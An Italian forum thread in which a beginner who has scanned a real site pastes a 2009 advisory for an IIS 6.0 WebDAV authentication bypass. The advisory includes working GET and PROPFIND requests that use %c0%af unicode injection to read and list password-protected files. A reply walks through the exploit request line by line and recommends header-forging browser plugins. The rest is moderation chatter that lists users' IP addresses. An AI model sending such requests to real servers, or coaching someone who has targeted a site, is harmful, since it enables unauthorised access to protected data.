exploit microsoft iis 6.0 webdav domande

Stato
Discussione chiusa ad ulteriori risposte.

imported_Heris

Utente Silver
18 Ottobre 2007
0
0
0
59
Ieri ho fatto uno scan ad un sito e ho visto che aveva la porta 80 aperta..sono andato a cercare un exploit..e ho trovato questo:
####
# #####
#### # #####
####### ### ######
####### ###### #######
######### ####### ########
##################### #########
#### ######### ########## ####
#### ###### ####### ####
#### #### #### ####
#### # #####
######## ###### ######
###############################
# #### ##############################
####### ## # ##
###### ##### ### ## ####
##### ##### ######## #### ####### ##
##### #### # ######### #### #################
#### ##### #### ######## #### ##################
####### ##### #### ######### #### ##### #####
################# #### #### #### #### ##### #####
############## #### #### ##### ########## #############
#### ##### #### #### #### ########## ############
#### ##### ######### #### #### ##### ####
#### ######### #### ######## #### ####
##### ############# ######## ##### ###########
##### ####### #### ####### ####################
##### ##### ## ####### ############ #####
#### ########### # ## ###### #
############## ## ############## #############
##### ###### ##### ################# #############
##### ###### ############ ####
###### # ######### #### #### ####
##### ######## #### ##### #### ###########
##### ###### ################## ###########
##### ##### ################# ############
####### ######### ########### #### ####
############### ############# #### ########
############# ########## #### ################
#### ###### ### ###############
# ###

archive: http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

*** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE ***

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope - May 12th, 2009


Affected Vendors

Microsoft

Affected Products

Web Server

Vulnerability Details

This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:

Authentication bypass of password protected folders
Listing, downloading and uploading of files into a password protected WebDAV folder

Authentication bypass of password protected folders

Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“

The attacker sends a HTTP GET request to the web server.

GET / %c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using
WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.

Listing files in a password protected WebDAV folder

The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
Nikolaos Rangos
Contact: [email protected]
Greetings to: alex and andi

# milw0rm.com [2009-05-15]

si sono un newbie però..volevo almeno capire di che si trattava..sono andato a cercare cosa è il webdav..e più o meno qualcosa ho capito..ma quando parla di "The attacker sends a HTTP GET request to the web server." non capisco cosa voglia dire..ho provato qui..ma non voglio risposte se pensate che voglio la pappa pronta..ero curioso di capire il funzionamento..grazie delle eventuali risposte ^^
 
interessante,
ma quando parla di "The attacker sends a HTTP GET request to the web server." non capisco cosa voglia dire..
beh..a grandi linee, quando tu apri una pagina web, tipo questa, il tuo browser ,che spero non sia InternetExplorer, deve connettersi al server che ospita il sito e richiedere di vedere la pagina. In questo caso il dialogo tra il tuo computer e il server avviene tramite un protocollo, l'HTTP (sopra al TCP). (un protocollo in sostanza è un metalinguaggio con cui due applicazioni possono comunicare tra loro e questo metalinguaggio consiste in una serie di regole che permettono alle applicazioni comunicanti una certezza per l'interpretazione dei messaggi scambiati.)
Dunque una richiesta HTTP è per esempio la richiesta che il tuo browser (o tu) fa per 'scaricare' una pagina web di un sito per poi visualizzarla.
La struttura è principalmente:
Codice:
<MODO> URI <version>
<headers>:<valori>
ossia nel primo caso dell'exploit:
Codice:
GET / %c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
dove GET è il modo, / %c0%af/protected/protected.zip è l'URI (ossia il la risorsa, la pagina o il file richiesto) e HTTP/1.1 è la versione, mentre Translate: f , Connection: close , Host: servername sono gli headers.
questa richiesta è fatta in modo che il server possa interpretarla cosi:
GET significa che il richiedente vuole il contenuto di URI e l'header Translate settato su 'f' significa che l'utente vuole il file non processato(il sorgente)mentre gli altri due header significano rispettivamente che dopo che è stata ricevuta la risposta verrà chiusa la connessione e il nome dell'host a cui si sta richiedendo la pagina.

spero di essere stato abb chiaro, mi sono appena alzato!

le richieste http le puoi vedere e forgiare tramite 2 bei plugin di firefox:
Live HTTP Headers e Modify headers

vai a cercarti su google una spiegazione del protocollo http e chiarisci i tuoi dubbi
 
Dark-Snake1992:

62.94.26.7 Ultimo IP conosciuto: Dark-Snake1992
62.94.26.7 Ultimo IP conosciuto: Activia_Frutta
62.94.26.7 IP di registrazione: Dang3r

Dimmi quali eliminare...
 
ShuraBozz ha detto:
Posso proporti di eliminare Dang3r e Activia_Frutta e bannare Dark-Snake1992 :O

è per quale motivo -.- ?
dang3r si registrò 1 ( o 2? ) anni fa e persi la password.
Activia frutta era per vedere un post ( 1 anno fa credo ) e mi ero addirittura scordato della sua esistenza.

Dark-Snake1992 è un account serio, nel senso che "intendo mantenerlo" e non abbandonarlo nel nulla...
 
la password può essere resettata tramite apposito modulo o chiedendo ad un admin di resettarla manualmente...gli account multipli non sono ammessi e questo è il motivo del tuo warn!ora sto con l'OT,il prossimo che va in ot viene bannato!
 
omg che incopetenti!!!! un sito con la porta 80 aperta :O
Heris hai mai visto siti con la porta 8080 aperta :O
Sono tutti pazzi questi hoster e sysadmin, ma dove andremo a finire
 
[ot]lol era già chiuso orakool...tu l'hai riaperto e io ora l'ho richiuso XD[/ot]
warn per shura!
malex evita una prossima volta o capiti pure tu!
 
Stato
Discussione chiusa ad ulteriori risposte.